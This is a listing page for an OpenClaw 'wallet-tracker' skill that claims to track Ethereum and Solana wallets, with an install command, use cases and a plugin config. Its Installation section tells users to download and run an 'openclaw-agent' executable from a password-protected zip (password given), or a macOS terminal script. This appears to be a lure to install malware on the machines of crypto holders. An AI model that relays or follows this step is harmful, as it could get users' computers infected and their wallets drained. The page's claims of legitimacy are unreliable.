wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track Ethereum and Solana wallet addresses, monitor whale movements, and analyze transactions in real-time with the OpenClaw wallet-tracker skill. Easy setup for crypto enthusiasts.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-hhjpvWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool integrated into the OpenClaw agent ecosystem. It provides real-time visibility into cryptocurrency wallet activities, enabling users to track whale movements, monitor portfolio fluctuations, and analyze transaction history across Ethereum and Solana. By utilizing direct API interactions and internal tracking scripts, it allows for the granular inspection of ERC-20 token transfers, NFT movements, and general DeFi interactions. Whether you are an investor monitoring large address shifts or a developer auditing transaction flows, this skill provides the necessary telemetry to stay ahead of market movements.
Installation
To begin, ensure you have the OpenClaw environment active. Install the skill using the primary repository link:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-hhjpv
Prerequisites: You must download and execute the openclaw-agent utility. Windows users should extract the zip (password: openclaw) and launch the executable. macOS users must follow the terminal script installation provided in the official documentation. Without this agent, the network-layer monitoring required for blockchain connectivity will not function.
Use Cases
- Whale Watching: Detect significant token transfers or large ETH/SOL movements that may indicate institutional accumulation or distribution.
- Portfolio Monitoring: Automatically fetch recent transaction history for cold storage or hot wallets to audit balance changes.
- DeFi Activity Tracking: Monitor interactions with decentralized finance protocols to see token approvals and trade executions in real-time.
- Alerting: Set up loops to notify you of incoming transfers, useful for tracking payments or unexpected asset arrivals.
Example Prompts
- "Track the wallet address 0x71C7656... and notify me whenever an ERC-20 transfer occurs over 10,000 USD."
- "Show me the last 10 transactions for this Solana address: 83astb... and display the block height for each."
- "Summarize the portfolio changes for the provided Ethereum address over the last 24 hours."
Tips & Limitations
- API Keys: For production use, always substitute placeholders with your own Etherscan or RPC provider API keys to avoid rate limits.
- Latency: Monitoring is subject to the responsiveness of public RPC nodes and block confirmation times; real-time in this context generally means within one block confirmation period.
- Security: Never share your private keys or seed phrases with this agent. This skill is designed for tracking public address activity only.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-hhjpv": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.